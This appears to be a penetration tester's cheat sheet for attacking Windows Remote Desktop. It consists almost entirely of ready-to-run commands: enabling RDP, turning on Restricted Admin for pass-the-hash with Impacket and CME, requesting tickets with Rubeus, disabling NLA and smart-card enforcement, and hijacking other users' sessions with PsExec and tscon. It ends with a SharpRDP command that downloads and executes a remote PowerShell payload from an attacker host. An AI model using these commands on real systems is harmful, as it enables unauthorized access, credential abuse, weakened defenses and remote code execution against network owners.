Terminal Services API
qwinsta
Enable RDP
With meterpreter:
meterpreter > run getgui -e
With PowerShell:
PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1
Manually add firewall rule (if necessary):
Cmd > netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in protocol=TCP localport=3389 action=allow
PS > New-NetFirewallRule -DisplayName 'Allow Remote Desktop' -Profile @('Domain', 'Private') -Direction Inbound -Action Allow -Protocol TCP -LocalPort @('3389')
Restricted Admin
RDP with PtH: RDP needs a plaintext password unless Restricted Admin mode is enabled.
Check / enable / disable with PowerShell:
PS > Get-ChildItem "HKLM:\System\CurrentControlSet\Control\Lsa" -Recurse
PS > Get-Item "HKLM:\System\CurrentControlSet\Control\Lsa"
PS > New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 -PropertyType "DWORD"
PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin"
PS > Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 1
PS > Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin"
Check / enable / disable with Impacket:
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -s
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 0
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 1
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 delete -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
Enable with CME:
$ cme smb 192.168.1.11 -u Administrator -H fc525c9683e8fe067095ba2ddc971889 -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'
Usage:
$ xfreerdp /pth ...
Cmd > mstsc.exe /restrictedAdmin ...
Remote Credential Guard
Cmd > ksetup /addkdc MEGACORP.LOCAL dc01.megacorp.local
Cmd > ksetup /setrealmflags MEGACORP.LOCAL tcpsupported
Cmd > shutdown -r -t 0
Cmd > Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:dc01.megacorp.local /aes256:<AES_KEY> /opsec /nowrap /ptt
Cmd > Rubeus.exe asktgs /ticket:<TICKET> /service:TERMSRV/PC01.megacorp.local,CIFS/PC01.megacorp.local,HOST/PC01.megacorp.local /domain:megacorp.local /dc:dc01.megacorp.local /nowrap /ptt
Cmd > mstsc.exe /remoteGuard ...
Smart Card Authentication
Disable enforced smart card authentication during interactive logon:
PS > Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\System" -Name "scforceoption"
PS > Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\System" -Name "scforceoption" -Value 0
Emulating PIV
NLA
Disable NLA:
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
Hijack RDP Sessions
Run Task manager as LocalSystem to hijack other users' sessions:
PS > .\PsExec64.exe -si C:\Windows\System32\Taskmgr.exe -accepteula
The same can be achieved with tscon.exe
:
PS > .\PsExec64.exe -s \\localhost cmd
PS > quser.exe
PS > cmd /k tscon.exe <ID> /dest:<CURRENT_SESSIONNAME>
Tools
Tools
SharpRDP
Cmd > .\SharpRDP.exe computername=srv01 command="iex(new-object net.webclient).downloadstring('http://10.10.13.37:8080/grunt.ps1')" username=megacorp\snovvcrash password=Passw0rd!
SharpRDPHijack
TakeMyRDP
Last updated